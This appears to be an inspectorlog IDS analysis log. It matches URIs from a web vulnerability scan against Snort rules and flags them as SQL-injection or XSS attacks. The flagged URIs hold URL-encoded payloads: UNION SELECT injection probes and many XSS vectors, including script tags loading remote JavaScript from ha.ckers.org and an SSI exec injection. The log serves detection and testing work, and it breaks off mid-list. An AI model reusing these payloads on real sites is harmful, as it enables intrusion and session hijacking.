# inspectorlog v3.5
#----- Initializing Rules (SNORT) ---------------------
# Rules directory : "/home/kali/Downloads/reglas_javi/snort"
#	Opening SNORT rule file /home/kali/Downloads/reglas_javi/snort/http_uri-sn-20220324.rules... done
#		Rules: read [3749], erroneous [0], URI [384]
#	Opening SNORT rule file /home/kali/Downloads/reglas_javi/snort/http_uri-er-20220224.rules... done
[parse_snortRule] WARNING: Line [4970] exceeds allowed number of PCRE fields
#		Rules: read [6015], erroneous [0], URI [5116]
#----- Statistics (SNORT) ------------------------------
# Read [9764] Snort rules, [5500] http-related, [0] with errors
#----- Analysis results ----------------------------
# Alerts & signatures generated from: /home/kali/Downloads/inspectorlog/inspectorlog -l grabber.uri -r /home/kali/Downloads/reglas_javi/snort -t list -o snort/grabber.clean
Packet [16]	Uri [/web/?demo-email=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE]	Nattacks [1]	Signatures	[2006445]
Packet [17]	Uri [/web/?demo-email=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE]	Nattacks [1]	Signatures	[2006445]
Packet [32]	Uri [/web/?name=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE]	Nattacks [1]	Signatures	[2006445]
Packet [33]	Uri [/web/?name=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE]	Nattacks [1]	Signatures	[2006445]
Packet [48]	Uri [/web/?demo-priority=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE]	Nattacks [1]	Signatures	[2006445]
Packet [49]	Uri [/web/?demo-priority=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE]	Nattacks [1]	Signatures	[2006445]
Packet [64]	Uri [/web/?demo-human=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE]	Nattacks [1]	Signatures	[2006445]
Packet [65]	Uri [/web/?demo-human=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE]	Nattacks [1]	Signatures	[2006445]
Packet [80]	Uri [/web/?demo-name=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE]	Nattacks [1]	Signatures	[2006445]
Packet [81]	Uri [/web/?demo-name=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE]	Nattacks [1]	Signatures	[2006445]
Packet [96]	Uri [/web/?demo-copy=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE]	Nattacks [1]	Signatures	[2006445]
Packet [97]	Uri [/web/?demo-copy=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE]	Nattacks [1]	Signatures	[2006445]
Packet [112]	Uri [/web/?email=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE]	Nattacks [1]	Signatures	[2006445]
Packet [113]	Uri [/web/?email=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE]	Nattacks [1]	Signatures	[2006445]
Packet [128]	Uri [/web/?demo-email=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE&name=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE&demo-priority=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE&demo-human=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE&demo-name=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE&demo-copy=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE&email=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE&]	Nattacks [1]	Signatures	[2006445]
Packet [185]	Uri [/web/?demo-email=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E]	Nattacks [1]	Signatures	[2009714]
Packet [186]	Uri [/web/?demo-email=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E]	Nattacks [1]	Signatures	[2009714]
Packet [191]	Uri [/web/?demo-email=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E]	Nattacks [1]	Signatures	[2009714]
Packet [192]	Uri [/web/?demo-email=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E]	Nattacks [1]	Signatures	[2009714]
Packet [209]	Uri [/web/?demo-email=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D]	Nattacks [1]	Signatures	[2009714]
Packet [210]	Uri [/web/?demo-email=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D]	Nattacks [1]	Signatures	[2009714]
Packet [211]	Uri [/web/?demo-email=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [212]	Uri [/web/?demo-email=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [213]	Uri [/web/?demo-email=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [214]	Uri [/web/?demo-email=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [215]	Uri [/web/?demo-email=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [216]	Uri [/web/?demo-email=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [219]	Uri [/web/?demo-email=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [220]	Uri [/web/?demo-email=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [241]	Uri [/web/?demo-email=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [242]	Uri [/web/?demo-email=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [247]	Uri [/web/?demo-email=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [248]	Uri [/web/?demo-email=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [257]	Uri [/web/?demo-email=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [258]	Uri [/web/?demo-email=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [259]	Uri [/web/?demo-email=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [260]	Uri [/web/?demo-email=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [261]	Uri [/web/?demo-email=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [262]	Uri [/web/?demo-email=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [263]	Uri [/web/?demo-email=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [264]	Uri [/web/?demo-email=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [269]	Uri [/web/?demo-email=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [270]	Uri [/web/?demo-email=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [275]	Uri [/web/?demo-email=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [276]	Uri [/web/?demo-email=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [287]	Uri [/web/?demo-email=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [288]	Uri [/web/?demo-email=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [295]	Uri [/web/?demo-email=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [296]	Uri [/web/?demo-email=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [305]	Uri [/web/?demo-email=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [306]	Uri [/web/?demo-email=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [321]	Uri [/web/?demo-email=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [322]	Uri [/web/?demo-email=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [325]	Uri [/web/?demo-email=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [326]	Uri [/web/?demo-email=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [335]	Uri [/web/?demo-email=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [336]	Uri [/web/?demo-email=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [343]	Uri [/web/?demo-email=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [344]	Uri [/web/?demo-email=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [405]	Uri [/web/?name=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E]	Nattacks [1]	Signatures	[2009714]
Packet [406]	Uri [/web/?name=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E]	Nattacks [1]	Signatures	[2009714]
Packet [411]	Uri [/web/?name=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E]	Nattacks [1]	Signatures	[2009714]
Packet [412]	Uri [/web/?name=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E]	Nattacks [1]	Signatures	[2009714]
Packet [429]	Uri [/web/?name=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D]	Nattacks [1]	Signatures	[2009714]
Packet [430]	Uri [/web/?name=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D]	Nattacks [1]	Signatures	[2009714]
Packet [431]	Uri [/web/?name=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [432]	Uri [/web/?name=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [433]	Uri [/web/?name=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [434]	Uri [/web/?name=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [435]	Uri [/web/?name=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [436]	Uri [/web/?name=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [439]	Uri [/web/?name=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [440]	Uri [/web/?name=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [461]	Uri [/web/?name=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [462]	Uri [/web/?name=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [467]	Uri [/web/?name=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [468]	Uri [/web/?name=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [477]	Uri [/web/?name=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [478]	Uri [/web/?name=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [479]	Uri [/web/?name=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [480]	Uri [/web/?name=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [481]	Uri [/web/?name=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [482]	Uri [/web/?name=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [483]	Uri [/web/?name=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [484]	Uri [/web/?name=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [489]	Uri [/web/?name=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [490]	Uri [/web/?name=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [495]	Uri [/web/?name=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [496]	Uri [/web/?name=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [507]	Uri [/web/?name=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [508]	Uri [/web/?name=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [515]	Uri [/web/?name=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [516]	Uri [/web/?name=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [525]	Uri [/web/?name=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [526]	Uri [/web/?name=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [541]	Uri [/web/?name=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [542]	Uri [/web/?name=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [545]	Uri [/web/?name=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [546]	Uri [/web/?name=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [555]	Uri [/web/?name=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [556]	Uri [/web/?name=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [563]	Uri [/web/?name=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [564]	Uri [/web/?name=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [625]	Uri [/web/?demo-priority=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E]	Nattacks [1]	Signatures	[2009714]
Packet [626]	Uri [/web/?demo-priority=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E]	Nattacks [1]	Signatures	[2009714]
Packet [631]	Uri [/web/?demo-priority=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E]	Nattacks [1]	Signatures	[2009714]
Packet [632]	Uri [/web/?demo-priority=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E]	Nattacks [1]	Signatures	[2009714]
Packet [649]	Uri [/web/?demo-priority=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D]	Nattacks [1]	Signatures	[2009714]
Packet [650]	Uri [/web/?demo-priority=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D]	Nattacks [1]	Signatures	[2009714]
Packet [651]	Uri [/web/?demo-priority=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
